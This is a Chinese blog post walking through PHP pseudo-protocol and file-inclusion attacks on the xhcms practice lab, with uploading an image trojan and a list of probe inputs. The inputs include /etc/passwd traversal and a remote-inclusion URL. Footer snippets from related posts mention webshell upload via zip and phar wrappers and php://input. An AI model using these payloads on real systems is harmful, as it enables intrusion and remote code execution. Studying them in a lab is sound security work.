w24文件上传之PHP伪协议

已于 2024-01-28 16:41:43 修改
阅读量294 收藏
点赞数 2
分类专栏: php 文章标签: php 开发语言
于 2024-01-27 11:32:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zxcz123123421/article/details/135852765
版权

PHP支持的伪协议

file:// - 访问本地文件系统
http:// - 访问网址
ftp:// - 访问文件
php:// -访问各个输入/输出流
zlib:// -压缩流
data:// - 数据
glob:// -查找匹配的文件路径模式
phar:// - php归档
ssh2:// - Secure shell 2
rar:// - RAR
ogg:// - 音频流
expect:// - 处理交互式的流

各协议的利用条件和方法

在这里插入图片描述

熊海靶场安装(xhcms)

安装环境

burp2024
phpstudy 5.3.29nts+apache
火狐浏览器(谷歌浏览器不能找到文件包含漏洞)

1.创建网站
在这里插入图片描述
2.安装靶场

在这里插入图片描述
3.输入正确的数据库用户名和密码,自动导入,此时php的版本不要太高,不能选择7.x以上的本吧。选择5.2~5.3的版本即可,否则页面的内容展示不了。
在这里插入图片描述
4.在发布文章,有图片的上传点,开始爆破。
在这里插入图片描述
5.上传一个包含phpinfo的图片马,返回文件上传后的路径/upload/watermark/20581706431088.gif
在这里插入图片描述
6.成功上传,要解析图片马,需要找到文件包含漏洞,根据文件包含的特征,匹配网站内的请求

文件包含漏洞的特征
?page=a.php
?home=b.html
?file=content
检测方法
?file=../../../../etc/passwd
?page=file:///etc/passwd
?home=main.cgi
?page=http://192.168.189.78/1.txt
http://1.1.1.1/../../../../dir/file.txt

在首页的美国时间,找到的文件包含漏洞,该路径包含了ustime.php文件。

在这里插入图片描述

7.拼接请求
在这里插入图片描述

杭城我最帅
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
STM32L471_HAL_SPI1_W24Q64读写代码
11-14
STM32L471_HAL_SPI1_W24Q64读写测试 之前都是标准库写的,这次换成了HAL库 可以看到风格是MX生成代码 然后搬运到对应的模块的地方
PSI2W24D5S12S的技术参数
12-12
产品型号:PSI2W24D5S12S输入电压(V):24±5%输出电压(V):+5±10%/+12±10%输出电流(mA):300/50隔离电压:2000Vrms描述:双输出隔离型DC-DC电源外形尺寸(mm):DIP24 32.2×16.5×10.2价格/1片(套):¥49.00  
PS10W24S-BOM的技术参数
12-12
产品型号:PS10W24S-BOM输入电压(交流AC,直流DC):165-265AC或234-375DC输出电压(V):+24.0±2%输出电流(mA):400说明:器件套件。10套起售价格/1片(套):¥26.00  
文件上传】zip伪协议上传解析
serendipity1130的博客
08-29 1805
1.打开界面是登陆框,查看源码,发现有文件包含include($_GET['file']) 2.然后根据题目名称:文件上传,访问网址:/upload.php发现了文件上传点,先上传了jpg图片,发现不能用菜刀连接,应该是无法解析jpg。 3.因为有文件包含,所以考虑到使用伪协议包含木马图片的文件进行菜刀连接,因为都有过滤,最终尝试了zip伪协议可以进行访问。 4.方法:首先制作一句话木马的zip包,然后将后缀名改为jpg,进行上传,上传成功后复制图片地址,可以发现图片的地址为upload/2.jpg
PHP代码审计15—PHP伪协议入门
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-20 1008
PHP简单的伪协议使用
php文件包含 伪协议
m0_64361111的博客
02-28 1021
PHP有很多内置 URL风格的封装协议,这类协议与fopen()、 copy()、 file_exists()和filesize()的文件系统函数所提供的功能类似。 zip:// 伪协议 先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,如果可以上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传 在网站根目录创建1.txt,内容为 压缩,压缩后在浏览器访问 php://input ..
文件包含伪协议总结备忘录
告白的博客
01-16 2065
0x00 文件包含漏洞 漏洞参数原因:源码采用include危险函数,传入对象参数由用户输入控制,可访问上传的包含文件页面 漏洞利用前提:知道包含文件解析的绝对路径,可访问绝对路径页面 常见的为协议分类: file:// 访问本地文件系统 http:// 访问 HTTPs 网址 ftp:// 访问 ftp URL Php:// 访问输入输出流 Zlib:// 压缩流 Data:// 数据 Ssh2:// security shell2 Expect:// 处理交互式的流 Glob://
phar://、zip://伪协议进行shell上传
weixin_43749601的博客
06-18 1210
phar:// 环境:可上传png、jpg 首先写一个一句话木马shell.php接着压缩成zip文件。将后缀改为png文件进行上传,上传文件后使用shell工具进行连接。 http://localhost/?url=phar://uploads/63e93ffe53f03e93bb0a0249152d243874e31c9b.png/shell zip:// 环境:可上传png、zip 首先写一个一句话木马shell.php接着压缩成zip文件。直接上传zip文件,然后使用shell工具进行连接。 htt
渗透测试——六、网站漏洞——文件上传
钟言的博客
12-06 9262
本篇是学习渗透测试的第六课,网络漏洞之文件上传漏洞,详细内容包含了:文件包含 PHP伪协议文件上传四、文件包含页面之包含测试五、文件上传页面之上传测试等等,
伪协议总结
m0_62805300的博客
04-24 2045
php file://:访问本地文件系统。 http://localhost/test.php?file=file://C:\Windows\System32\drivers\etc\hosts php://访问各个输入输出流 php://input:将POST输入流当做PHP代码执行。 http://localhost/test.php?file=php://input POST:<?php phpinfo(); php://filter: 一种元封装器, 设计用于数
stm32驱动W24Q16
08-10
W24Q16是FLASH存储芯片,容量为16Mbit。注意是16Mbit,其实就是2M-byte。W24Q16采用的是spi总线。但是这个spi总线有三种方式。
四、文件包含漏洞[伪协议、读取文件、命令执行]
黑日里不灭的light
10-30 379
php://input:一般配合post输入,它提供了一种直接获取 POST 请求数据的方式,尤其适用于处理来自客户端的原始数据。php://filter:用于对流进行各种过滤或转换操作,允许你在读取或写入流数据之前对其进行处理。file://:用来访问本地文件。
Steamdeck使用Windows系统游玩雪地奔驰时闪退问题解决方法
fxalll的博客
05-28 439
在github正好有一个叫dxvk的库,能够基于vulkan实现d3d11,因此我们访问https://github.com/doitsujin/dxvk,从 Releases下载dxvk-2.3.1.tar.gz(当前最新版本),解压压缩包,在x64 目录中获取 dxgi.dll 和 d3d11.dll,并将两个dll文件放进Snowrunner.exe根目录所在的位置,再次启动游戏,游戏果然正常运行了。因此我自己分析终于解决该问题。困扰我两天的问题终于解决了,也算这个小众游戏全网的第一个解决方案吧。
PbootCMS后台用户账号密码时进行重置工具
itfans123的博客
05-29 243
2)在浏览器直接访问访问该文件地址,然后按照页面提示输入相关信息进行重置,此处填写的“数据库配置文件”用于重置工具连接数据,如果没有做过特殊改动,一般默认即可,然后输入要重置的账号和新密码,重置后一定要记得删除该工具,切记!1)下载重置工具解压包,解压后将resetpw.php文件直接上传到网站根目录下;使用完之后一定要删除resetpw.php文件!工具用于忘记PbootCMS后台用户账号密码时进行重置。
HackTheBox-Machines--Popcorn
七天
05-28 543
Popcorn 测试过程。
3.location的写法
u010198709的博客
05-28 400
让服务器接收到请求后,根据需求改写地址,以改写的地址给客户端响应。优先级: =, ^~, ~, ~*, location /nginx通过fastCGI机制调用PHP,处理动态资源。php以fpm的方式运行,有自己独立的进程、服务。将httpd换为nginx,高并发、高性能。作用: 匹配客户端响应。
建WordPress主题官网模板
最新发布
xiaoyuya
05-30 279
WordPress主题官网模板
PHP深入理解-PHP架构布局
weixin_44703272的博客
05-27 288
执行流程:解析为Token:将PHP代码解析成标记(tokens)。TSRM:线程资源管理相关的目录,一般只有和Apache结合使用时会涉及到线程资源管理相关的代码。ext:主要是扩展相关的目录,通过ext_skel命令生成自定义模块,会默认安装到这个目录。目录结构:sapi:存放根据不同环境支持的上层API交互形式,实现了不同的输入输出形式。架构结构:Zend层:为上层的PHP提供基础的内存管理和数据结构。SAPI层:与服务器进行通信,封装了不同的通信类型,如CGI、FastCGI和CLI。
W24N FLASH芯片
07-27
W24N FLASH芯片是一款由瑞萨电子(Renesas Electronics)推出的闪存存储器芯片。该芯片采用NAND闪存技术,可用于嵌入式系统、消费电子产品和移动设备等领域。W24N FLASH芯片具有高速、高密度和低功耗的特点,能够提供可靠的数据存储和快速的数据读写能力。它通常用于存储固件、操作系统、应用程序和其他数据。这款芯片在市场上有较广泛的应用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值